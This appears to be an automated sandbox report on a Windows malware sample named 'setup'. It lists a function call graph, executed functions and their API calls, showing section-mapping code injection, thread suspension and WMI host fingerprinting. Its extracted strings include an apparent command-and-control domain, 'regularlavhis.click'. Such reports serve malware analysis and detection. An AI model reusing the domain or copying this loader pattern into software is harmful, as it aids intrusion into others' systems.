90601->90590 90604 1020a9b CreateToolhelp32Snapshot 90603->90604 90606 10205cb 90604->90606 90607 1020ad2 Thread32First 90604->90607 90606->90594 90606->90595 90608 1020b8e CloseHandle 90607->90608 90609 1020af9 90607->90609 90608->90606 90609->90608 90610 1020b30 Wow64SuspendThread 90609->90610 90611 1020b5a CloseHandle 90609->90611 90610->90611 90611->90609 90612->90597 90613->90601 90617 102098e 90614->90617 90615 10209ee CreateThread 90615->90617 90618 1021165 90615->90618 90616 1020a3b 90617->90615 90617->90616 90621 1071d2a 90618->90621 90622 1071d4f 90621->90622 90623 1071e39 90621->90623 90654 10745ac 90622->90654 90633 1073005 90623->90633 90626 1071d67 90627 10745ac LoadLibraryA 90626->90627 90632 102116a 90626->90632 90628 1071da9 90627->90628 90629 10745ac LoadLibraryA 90628->90629 90630 1071dc5 90629->90630 90631 10745ac LoadLibraryA 90630->90631 90631->90632 90634 10745ac LoadLibraryA 90633->90634 90635 1073028 90634->90635 90636 10745ac LoadLibraryA 90635->90636 90637 1073040 90636->90637 90638 10745ac LoadLibraryA 90637->90638 90639 107305e 90638->90639 90640 1073073 VirtualAlloc 90639->90640 90652 1073087 90639->90652 90642 10730a1 90640->90642 90640->90652 90641 10745ac LoadLibraryA 90643 107311f 90641->90643 90642->90641 90642->90652 90647 1073175 90643->90647 90643->90652 90658 10743b3 90643->90658 90644 10745ac LoadLibraryA 90644->90647 90646 10731d7 90646->90652 90653 1073239 90646->90653 90686 1072195 LoadLibraryA 90646->90686 90647->90644 90647->90646 90647->90652 90649 1073222 90649->90652 90687 1072290 LoadLibraryA 90649->90687 90652->90632 90653->90652 90662 1073735 90653->90662 90655 10745c3 90654->90655 90656 10745ea 90655->90656 90699 10726b1 LoadLibraryA 90655->90699 90656->90626 90660 10743c8 90658->90660 90659 107443e LoadLibraryA 90661 1074448 90659->90661 90660->90659 90660->90661 90661->90643 90663 1073770 90662->90663 90664 10737b7 NtCreateSection 90663->90664 90665 10737dc 90663->90665 90676 1073de4 90663->90676 90664->90665 90664->90676 90666 1073871 NtMapViewOfSection 90665->90666 90665->90676 90679 1073891 90666->90679 90667 1073bba VirtualAlloc 90672 1073bfc 90667->90672 90668 10743b3 LoadLibraryA 90668->90679 90669 10743b3 LoadLibraryA 90675 1073b18 90669->90675 90670 1073cad VirtualProtect 90673 1073d78 VirtualProtect 90670->90673 90682 1073ccd 90670->90682 90671 1073bb6 90671->90667 90672->90670 90672->90676 90683 1073c9a NtMapViewOfSection 90672->90683 90678 1073da7 90673->90678 90674 1074451 LoadLibraryA 90674->90679 90675->90667 90675->90669 90675->90671 90688 1074451 LoadLibraryA 90675->90688 90676->90652 90677 1073ef2 90677->90676 90680 1073efa CreateThread 90677->90680 90678->90676 90678->90677 90689 1074166 LoadLibraryA 90678->90689 90679->90668 90679->90674 90679->90675 90679->90676 90680->90676 90690 3008850 90680->90690 90682->90673 90685 1073d52 VirtualProtect 90682->90685 90683->90670 90683->90676 90685->90682 90686->90649 90687->90653 90688->90675 90689->90677 90692 300885f 90690->90692 90691 3008b97 RtlExitUserThread 90692->90691 90693 3008874 GetCurrentProcessId GetCurrentThreadId 90692->90693 90698 3008afa 90692->90698 90694 300889a 90693->90694 90695 300889e SHGetSpecialFolderPathW GetForegroundWindow 90693->90695 90694->90695 90696 3008956 90695->90696 90697 303f1d0 RtlAllocateHeap 90696->90697 90697->90698 90698->90691 90699->90655 90700 3017ef9 90701 3017f06 90700->90701 90702 3044270 LdrInitializeThunk 90701->90702 90703 30180ba 90702->90703 90703->90703 90704 3044270 LdrInitializeThunk 90703->90704 90705 3018289 90704->90705 90706 300cf79 CoInitializeSecurity 90210 3025838 90211 3025842 90210->90211 90214 3044270 90211->90214 90213 3025954 90215 3044290 90214->90215 90216 304436e 90215->90216 90218 3040be0 LdrInitializeThunk 90215->90218 90216->90213 90218->90216 90219 304183e GetForegroundWindow 90220 304185b 90219->90220 90707 302e87f 90708 302e88b 90707->90708 90708->90708 90709 302f5ba GetPhysicallyInstalledSystemMemory 90708->90709 90710 302f600 90709->90710

                                                                                                                          Executed Functions

                                                                                                                          Function 030125E0 Relevance: 122.8, APIs: 2, Strings: 67, Instructions: 2033COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $ $"$"$$$$$%$&$($*$+$1$2$3$4$5$8$9$:$<$<$>$?$A$C$C$D$D$D$E$E$F$F$G$G$H$I$J$K$L$P$Q$S$U$U$W$Y$Y$Y$[$[$[$]$_$_$`$`$`$`$b$c$f$t$x$x$|$~
                                                                                                                          • API String ID: 0-3106034677
                                                                                                                          • Opcode ID: 821484b8c87cad604e257fdec91d106163c266f0b12a8e60be5635fab67c5693
                                                                                                                          • Instruction ID: c85bf48d990ee15a569837e904d09b33bb84064b9c1aef77646f1ba8c99accdb
                                                                                                                          • Opcode Fuzzy Hash: 821484b8c87cad604e257fdec91d106163c266f0b12a8e60be5635fab67c5693
                                                                                                                          • Instruction Fuzzy Hash: 3413CE7550E7C08AD335DB38888839FBBE1AB96324F084E6DE4E98B3D2D77984458753
                                                                                                                          Function 0303BDD0 Relevance: 23.7, APIs: 9, Strings: 4, Instructions: 904memorycomCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 472 303bdd0-303be01 473 303be10-303be24 472->473 473->473 474 303be26-303be4b 473->474 475 303be50-303be83 474->475 475->475 476 303be85-303bedf 475->476 477 303bee0-303bf0a 476->477 477->477 478 303bf0c-303bf31 477->478 480 303bf37-303bf57 478->480 481 303c006-303c017 478->481 482 303bf60-303bf90 480->482 483 303c020-303c03e 481->483 482->482 484 303bf92-303bfae 482->484 483->483 485 303c040-303c0b1 483->485 486 303bfb0-303bff7 484->486 487 303c0c0-303c109 485->487 486->486 488 303bff9-303bffe 486->488 487->487 489 303c10b-303c163 487->489 488->481 490 303c170-303c1a1 489->490 490->490 491 303c1a3-303c1f5 CoCreateInstance 490->491 492 303c7a1-303c7d1 call 30427b0 GetVolumeInformationW 491->492 493 303c1fb-303c239 491->493 498 303c7d3-303c7d7 492->498 499 303c7db-303c7dd 492->499 494 303c240-303c278 493->494 494->494 496 303c27a-303c2a5 SysAllocString 494->496 502 303c790-303c79d SysFreeString 496->502 503 303c2ab-303c2c5 CoSetProxyBlanket 496->503 498->499 500 303c7ed-303c7f4 499->500 504 303c800-303c827 500->504 505 303c7f6-303c7fd 500->505 502->492 506 303c786-303c78c 503->506 507 303c2cb-303c2fb 503->507 508 303c830-303c85f 504->508 505->504 506->502 509 303c300-303c325 507->509 508->508 510 303c861-303c8a3 508->510 509->509 511 303c327-303c3b6 SysAllocString 509->511 512 303c8b0-303c8dd 510->512 513 303c3c0-303c3fc 511->513 512->512 514 303c8df-303c906 call 301db10 512->514 513->513 515 303c3fe-303c42b SysAllocString 513->515 519 303c910-303c918 514->519 520 303c431-303c453 515->520 521 303c770-303c782 515->521 519->519 522 303c91a-303c91c 519->522 529 303c766-303c76c 520->529 530 303c459-303c45c 520->530 521->506 523 303c922-303c932 call 30081e0 522->523 524 303c7e0-303c7e7 522->524 523->524 524->500 525 303c937-303c93e 524->525 529->521 530->529 532 303c462-303c467 530->532 532->529 534 303c46d-303c4e1 VariantInit 532->534 535 303c4f0-303c527 534->535 535->535 536 303c529-303c542 535->536 537 303c546-303c54c 536->537 538 303c552-303c55b 537->538 539 303c755-303c762 VariantClear 537->539 538->539 540 303c561-303c56e 538->540 539->529 541 303c570-303c575 540->541 542 303c5bd 540->542 544 303c596-303c59a 541->544 543 303c5bf-303c5d9 call 3008050 542->543 553 303c5df-303c5e9 543->553 554 303c6fe-303c70f 543->554 546 303c580-303c588 544->546 547 303c59c-303c5a7 544->547 549 303c58b-303c594 546->549 550 303c5b0-303c5b6 547->550 551 303c5a9-303c5ae 547->551 549->543 549->544 550->549 552 303c5b8-303c5bb 550->552 551->549 552->549 553->554 555 303c5ef-303c5f7 553->555 556 303c711 554->556 557 303c716-303c729 554->557 558 303c600-303c60e 555->558 556->557 559 303c730-303c752 call 3008080 call 3008060 557->559 560 303c72b 557->560 561 303c620-303c626 558->561 562 303c610-303c615 558->562 559->539 560->559 565 303c644-303c650 561->565 566 303c628-303c62b 561->566 564 303c6b0-303c6b4 562->564 568 303c6b6-303c6bc 564->568 570 303c652-303c655 565->570 571 303c6c8-303c6d0 565->571 566->565 569 303c62d-303c642 566->569 568->554 573 303c6be-303c6c0 568->573 569->564 570->571 576 303c657-303c6af 570->576 571->568 574 303c6d2-303c6d5 571->574 573->558 577 303c6c6 573->577 578 303c6d7-303c6f8 574->578 579 303c6fa-303c6fc 574->579 576->564 577->554 578->564 579->564
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.COMBASE( )*+,00000000,00000001,?,00000000), ref: 0303C1ED
                                                                                                                          • SysAllocString.OLEAUT32(F90FFF0C), ref: 0303C27F
                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0303C2BD
                                                                                                                          • SysAllocString.OLEAUT32(6A84749C), ref: 0303C32C
                                                                                                                          • SysAllocString.OLEAUT32(A579AB79), ref: 0303C403
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0303C475
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                          • String ID: )*+$?<$Z[$q
                                                                                                                          • API String ID: 65563702-2964544060
                                                                                                                          • Opcode ID: 5d9a81aad9d40283bce3575497ffe3ac98584f4f615fb646c44a360a15815a21
                                                                                                                          • Instruction ID: c85148d5aa3d86ecbd36c5835e6dd8a63345a93243bcca2ca272e0f0c539ea38
                                                                                                                          • Opcode Fuzzy Hash: 5d9a81aad9d40283bce3575497ffe3ac98584f4f615fb646c44a360a15815a21
                                                                                                                          • Instruction Fuzzy Hash: 5052CCB56093418FE324CF24C88179BFBE5EF86314F08892DE995DB291D778D909CB92
                                                                                                                          Function 01073735 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 010737CE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 01073876
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 01073BEA
                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 01073C9F
                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 01073CBC
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 01073D5F
                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 01073D92
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01073F03
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1248616170-0
                                                                                                                          • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                          • Instruction ID: 13154cba0d353ccf9e1b5be08b123f8baa0aab19f8e89af97ac9e73b73e5c76f
                                                                                                                          • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                          • Instruction Fuzzy Hash: C9428971A08341AFEB64DF28C844B6BBBE9FF88700F04496DFA859B251D770E844DB55
                                                                                                                          Function 0300C5AE Relevance: 11.4, Strings: 9, Instructions: 113COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 807 300c5ae-300c7af 808 300c7b0-300c7f7 807->808 808->808 809 300c7f9-300c801 808->809 810 300c805-300c821 809->810
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !hin$-X ^$=D$Z$T$X:$[ W&$^8>$eTbj$l\hR${H{N
                                                                                                                          • API String ID: 0-4204190240
                                                                                                                          • Opcode ID: 253cd2c3c1ee0c0b6f6d559d889915b74475a7d09d4f4d1e008942d5e0312986
                                                                                                                          • Instruction ID: ab9f69ee8414dc68200bdaaad0afd511121e6e53651bf7d459730f30c9c1a9ff
                                                                                                                          • Opcode Fuzzy Hash: 253cd2c3c1ee0c0b6f6d559d889915b74475a7d09d4f4d1e008942d5e0312986
                                                                                                                          • Instruction Fuzzy Hash: DD511BF4925340CFE718DF658A88BA87EA1BB05200F1A82EDC2596F236C7799446CF94
                                                                                                                          Function 03008850 Relevance: 7.8, APIs: 5, Instructions: 266threadCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 03008874
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0300887E
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 03008933
                                                                                                                          • GetForegroundWindow.USER32 ref: 03008948
                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 03008B99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentThread$ExitFolderForegroundPathProcessSpecialUserWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2442286830-0
                                                                                                                          • Opcode ID: d9e1a6971104820b7970dc33e849810a61c11ff537098efbfa45da0a9456e772
                                                                                                                          • Instruction ID: 951beda474b4cef76d23da7044300f3653013914ff6e18332d1129dd274a92dc
                                                                                                                          • Opcode Fuzzy Hash: d9e1a6971104820b7970dc33e849810a61c11ff537098efbfa45da0a9456e772
                                                                                                                          • Instruction Fuzzy Hash: 7A814BB7B157144BD308EE688C953ABF6D6ABC4310F0E853CA998DB3D0EA788D0586C5
                                                                                                                          Function 01020A85 Relevance: 7.6, APIs: 5, Instructions: 100threadprocessCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 847 1020a85-1020acc CreateToolhelp32Snapshot 850 1020ba2-1020ba5 847->850 851 1020ad2-1020af3 Thread32First 847->851 852 1020af9-1020aff 851->852 853 1020b8e-1020ba0 CloseHandle 851->853 854 1020b01-1020b07 852->854 855 1020b6e-1020b88 852->855 853->850 854->855 856 1020b09-1020b28 854->856 855->852 855->853 856->855 859 1020b2a-1020b2e 856->859 860 1020b30-1020b44 Wow64SuspendThread 859->860 861 1020b46-1020b55 859->861 862 1020b5a-1020b6c CloseHandle 860->862 861->862 862->855
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,010205CB,?,00000001,?,81EC8B55,000000FF), ref: 01020AC3
                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 01020AEF
                                                                                                                          • Wow64SuspendThread.KERNEL32(00000000), ref: 01020B42
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 01020B6C
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 01020BA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2720937676-0
                                                                                                                          • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                          • Instruction ID: b1f1d161ab14176cbebff5b3bdb352c5ae2499fc190d91746101a02c17157243
                                                                                                                          • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                          • Instruction Fuzzy Hash: 28410E75A00218AFDB18DF9CC890BADBBF6EF88300F10C168E6559B794DA34EE45CB54
                                                                                                                          Function 030097A0 Relevance: 5.4, Strings: 4, Instructions: 379COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 883 30097a0-30097ae 884 30097b4-300982a call 3005fc0 call 3008050 883->884 885 3009ca6 883->885 891 3009830-300985d 884->891 886 3009ca8-3009cb4 885->886 891->891 892 300985f-30098a1 call 3009050 891->892 895 30098b0-30098c4 892->895 895->895 896 30098c6-3009918 call 3009050 895->896 899 3009920-3009964 896->899 899->899 900 3009966-30099af call 3009050 899->900 903 30099b0-30099ce 900->903 903->903 904 30099d0-30099ea 903->904 905 30099f0-3009a38 904->905 905->905 906 3009a3a-3009a76 call 3009050 905->906 909 3009a80-3009aa6 906->909 909->909 910 3009aa8-3009b7f call 3009310 909->910 913 3009b80-3009b94 910->913 913->913 914 3009b96-3009b9e 913->914 915 3009ba0-3009ba8 914->915 916 3009bc1-3009bcc 914->916 917 3009bb0-3009bbf 915->917 918 3009bf1-3009c2b 916->918 919 3009bce-3009bd1 916->919 917->916 917->917 921 3009c30-3009c67 918->921 920 3009be0-3009bef 919->920 920->918 920->920 921->921 922 3009c69-3009c7e call 300c560 921->922 924 3009c83-3009ca4 call 3008060 922->924 924->886
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: /$=$Bz$C04E036E6F31F2708EEA336AD54C4C07
                                                                                                                          • API String ID: 0-986211074
                                                                                                                          • Opcode ID: 7a837ed5a5d699415ed313f111c069e1123c76e93cb746d3ccb662bc285ea8fe
                                                                                                                          • Instruction ID: af5d4a08ee52d7aba9323732bc7a189db94bc5e2ff03397a3dff296a8c2ef103
                                                                                                                          • Opcode Fuzzy Hash: 7a837ed5a5d699415ed313f111c069e1123c76e93cb746d3ccb662bc285ea8fe
                                                                                                                          • Instruction Fuzzy Hash: FFC1EDB16097808FE314DF25C8A4BABBBE5EFC1308F14492DE1D58B392DB798509CB46
                                                                                                                          Function 0300D972 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 599COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 936 300d972-300d9a6 call 30097a0 CoUninitialize 939 300d9b0-300d9ed 936->939 939->939 940 300d9ef-300da1b 939->940 941 300da20-300da49 940->941 941->941 942 300da4b-300daa9 941->942 943 300dab0-300dad9 942->943 943->943 944 300dadb-300dae3 943->944 945 300dae5-300daef 944->945 946 300dafb-300db03 944->946 947 300daf0-300daf9 945->947 948 300db05-300db06 946->948 949 300db1b-300db26 946->949 947->946 947->947 950 300db10-300db19 948->950 951 300db28-300db2f 949->951 952 300db3d 949->952 950->949 950->950 953 300db30-300db39 951->953 954 300db40-300db48 952->954 953->953 955 300db3b 953->955 956 300db4a-300db4f 954->956 957 300db5d 954->957 955->954 958 300db50-300db59 956->958 959 300db60-300db68 957->959 958->958 960 300db5b 958->960 961 300db6a-300db6f 959->961 962 300db7b-300db87 959->962 960->959 963 300db70-300db79 961->963 964 300dba1-300dc66 962->964 965 300db89-300db8b 962->965 963->962 963->963 966 300dc70-300dcb3 964->966 967 300db90-300db9d 965->967 966->966 968 300dcb5-300dcdf 966->968 967->967 969 300db9f 967->969 970 300dce0-300dcf2 968->970 969->964 970->970 971 300dcf4-300dd45 call 300b970 call 30097a0 CoUninitialize 970->971 976 300dd50-300dd8d 971->976 976->976 977 300dd8f-300ddbf 976->977 978 300ddc0-300dde9 977->978 978->978 979 300ddeb-300de49 978->979 980 300de50-300de79 979->980 980->980 981 300de7b-300de83 980->981 982 300de85-300de8f 981->982 983 300de9b-300dea3 981->983 986 300de90-300de99 982->986 984 300dea5-300dea6 983->984 985 300debb-300dec6 983->985 987 300deb0-300deb9 984->987 988 300dec8-300decf 985->988 989 300dedd 985->989 986->983 986->986 987->985 987->987 990 300ded0-300ded9 988->990 991 300dee0-300dee8 989->991 990->990 992 300dedb 990->992 993 300deea-300deef 991->993 994 300defd 991->994 992->991 995 300def0-300def9 993->995 996 300df00-300df08 994->996 995->995 997 300defb 995->997 998 300df0a-300df0f 996->998 999 300df1b-300df27 996->999 997->996 1002 300df10-300df19 998->1002 1000 300df41-300e006 999->1000 1001 300df29-300df2b 999->1001 1004 300e010-300e053 1000->1004 1003 300df30-300df3d 1001->1003 1002->999 1002->1002 1003->1003 1005 300df3f 1003->1005 1004->1004 1006 300e055-300e07f 1004->1006 1005->1000 1007 300e080-300e092 1006->1007 1007->1007 1008 300e094-300e0ca call 300b970 1007->1008
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Uninitialize
                                                                                                                          • String ID: regularlavhis.click
                                                                                                                          • API String ID: 3861434553-469915533
                                                                                                                          • Opcode ID: 794502ab8df404e332346170b80c61dbe75bfca67f2e988447f08159ba37dca6
                                                                                                                          • Instruction ID: 897a5765f38a6d1ebbcf0dc125a1935bb41797b451ddd4193a23e048b8bbf5b2
                                                                                                                          • Opcode Fuzzy Hash: 794502ab8df404e332346170b80c61dbe75bfca67f2e988447f08159ba37dca6
                                                                                                                          • Instruction Fuzzy Hash: AC22BEB51067818FE759CF29C4A0722BFE2BF96300F18968CC4C64F78AD779A405CBA1
                                                                                                                          Function 00C91B40 Relevance: 4.4, APIs: 2, Instructions: 1437fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1011 c91b40-c91b6f call c789c9 1014 c91b71 1011->1014 1015 c91b73-c91b7d 1011->1015 1014->1015 1016 c91b7f 1015->1016 1017 c91b81-c91b83 1015->1017 1016->1017 1018 c91b8b-c91b97 1017->1018 1019 c91b85 1017->1019 1020 c91b99 1018->1020 1021 c91b9f-c91ba8 1018->1021 1019->1018 1020->1021 1022 c91baa 1021->1022 1023 c91bad-c91bc0 call c5e547 1021->1023 1022->1023
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: dd369c2467f12f22f4b5a85d25844aba2df978d119364432f2b2b13dbb0915e8
                                                                                                                          • Instruction ID: 0337f5321c4b58ca5d6d55f37c8ed4e339e1868e33c97beeca5a2e61bbbc3352
                                                                                                                          • Opcode Fuzzy Hash: dd369c2467f12f22f4b5a85d25844aba2df978d119364432f2b2b13dbb0915e8
                                                                                                                          • Instruction Fuzzy Hash: C5A24473D143248F9758EFF9EC86B6F3653F790310386822EE902C7566DF38454AAA85
                                                                                                                          Function 00C91D40 Relevance: 4.3, APIs: 2, Instructions: 1303fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1026 c91d40-c91d70 1027 c91d78-c93098 call c0f5a4 call c387cd call c714ce call c17e75 call c01753 call c3a09b call c772ef call c32937 call c4daa3 call c07e6c call c5594e call c7c990 call c8262c call c54e6f call c55053 call c51766 call c7c16a call c51528 call c6263c call c7c5d2 call c246a2 call c3233b call c4fc33 call c2de49 call c0eb57 call c6ae07 call c20553 call c27514 call c7447a call c1bd72 call c602be call c83b76 call c02b0f call c82af9 call c5fc4a call c82bd2 call c40b89 call c3b3d0 call c63805 call c29b87 call c4cf94 call c07cc2 call c2bcdc call c174d2 call c16c04 call c3be22 call c4db52 call c43bc6 call c7aac0 call c59427 call c368a0 call c17850 call c53678 call c2ceeb call c1f744 call c56deb call c0fa91 call c18b9b call c3233b call c7fcbe call c52eef call c07018 call c0607a call c7c5d2 call c2bea0 call c43992 call c54a1f call c42327 call c7b89d call c0217d call c4e076 call c6c647 call c1a656 call c43778 call c7447a call c077ef call c76ccb call c37761 CreateFileMappingW call c80a71 call c6e57e call c56d34 call c45a2a call c3a2fa call c06448 call c26d6d call c771d5 call c28e32 call c0693f call c45a2a call c5b4aa call c7eff0 call c77e04 call c298bc call c6da4a call c1ee66 call c4b055 call c86255 call c02517 call c73152 call c6271c call c33ac8 call c13b20 call c85016 call c7728c call c14c21 call c4b2d5 call c6a8e2 call c7de27 call c78cda call c60f8f call c02517 call c49e61 call c1d48f call c8084a call c418f7 call c33e8f call c5ecc9 call c3ab18 call c3110a call c540d8 call c7bed5 call c3d859 call c19117 call c4c5cf call c3dfbe call c69224 call c6a8e2 call c0c737 call c481b9 call c21b02 call c7be6e call c61b0e call c36710 call c13372 call c77627 call c68994 call c1bd72 MapViewOfFile call c85016 call c376c4 call c4b46d call c1969d call c5c73c call c31969 call c67053 call c7bbd8 call c5349d call c75c01 call c174d2 call c6f942 call c03556 call c7f9af call c28c1a call c4538c call c26596 call c7610f call c07cc2 call c5039b call c6d15b call c4d3ed call c10ba3 call c72073 call c2b4a2 call c36038 call c105f1 call c39d49 call c47006 1026->1027 1028 c91d73 call c44a01 1026->1028 1363 c9309d 1027->1363 1028->1027 1363->1363
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
